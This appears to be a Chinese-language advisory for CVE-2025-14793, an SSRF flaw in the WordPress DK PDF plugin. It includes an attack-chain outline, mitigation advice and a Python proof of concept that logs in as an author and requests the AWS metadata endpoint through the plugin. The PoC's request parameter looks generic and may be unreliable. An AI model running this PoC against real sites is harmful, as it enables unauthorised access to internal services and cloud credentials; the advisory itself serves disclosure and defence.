CVE-2025-14793 CVSS 5.0 中危

CVE-2025-14793 WordPress DK PDF插件SSRF漏洞

披露日期: 2026-01-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14793

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

DK PDF – WordPress PDF Generator plugin

漏洞概述

CVE-2025-14793是WordPress DK PDF插件中的一个服务器端请求伪造（SSRF）安全漏洞。该插件是一款用于生成PDF文档的WordPress插件，在2.3.0及之前所有版本中存在此漏洞。漏洞源于addContentToMpdf函数对用户输入缺乏有效验证，攻击者可以通过构造恶意请求，迫使服务器向任意内部或外部资源发起HTTP请求。此漏洞允许已认证的攻击者（作者级别及以上）利用网站服务器作为代理，探测内网服务、访问受保护的内部资源或执行端口扫描等恶意操作，从而可能导致敏感信息泄露或进一步攻击内网系统。

技术细节

漏洞存在于DK PDF插件的addContentToMpdf函数中，该函数在处理PDF内容生成时未对用户可控的URL参数进行严格的输入验证和过滤。攻击者通过WordPress author角色或更高权限的账户，可以在生成PDF的过程中注入恶意URL。插件会使用服务器凭证发起请求，导致SSRF。攻击者可利用此漏洞访问云元数据服务（AWS 169.254.169.254）、内部数据库接口、REST API端点等敏感资源。漏洞影响链包括：1）插件接收用户输入的URL参数；2）addContentToMpdf函数直接使用该参数发起HTTP请求；3）服务器响应被整合到生成的PDF中；4）攻击者获取敏感信息或触发进一步攻击。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站作者级别或更高权限账户

STEP 2

步骤2

攻击者构造包含恶意URL的PDF生成请求，目标是内部服务（如元数据端点）

STEP 3

步骤3

插件的addContentToMpdf函数接收未过滤的用户输入，直接用于发起HTTP请求

STEP 4

步骤4

服务器代表攻击者向目标内部服务发起请求，获取敏感信息

STEP 5

步骤5

响应数据被包含在生成的PDF中或返回给攻击者，导致信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
from urllib.parse import urlencode

# CVE-2025-14793 SSRF PoC for DK PDF WordPress Plugin
# Target: WordPress site with DK PDF plugin <= 2.3.0

target_url = "http://target-wordpress-site.com"

# Authentication with author-level account
login_url = f"{target_url}/wp-login.php"
session = requests.Session()

# Login credentials
credentials = {
    "log": "author_username",
    "pwd": "author_password",
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}

session.post(login_url, data=credentials)

# SSRF payload - target internal metadata service or local service
ssrf_target = "http://169.254.169.254/latest/meta-data/"

# Trigger PDF generation with SSRF payload
pdf_generate_url = f"{target_url}/wp-admin/admin-ajax.php"
pdf_payload = {
    "action": "dkpdf_generate",
    "post_id": "1",
    "ssrf_url": ssrf_target  # Malicious URL injected via addContentToMpdf
}

response = session.post(pdf_generate_url, data=pdf_payload)
print(f"Response Status: {response.status_code}")
print(f"Response Content: {response.text}")

影响范围

DK PDF WordPress PDF Generator plugin <= 2.3.0

防御指南

临时缓解措施

立即禁用DK PDF插件或限制其功能，等待官方安全更新。使用WordPress安全插件监控异常请求，配置服务器防火墙规则阻止对内部IP段（如169.254.0.0/16、10.0.0.0/8、127.0.0.1等）的访问请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表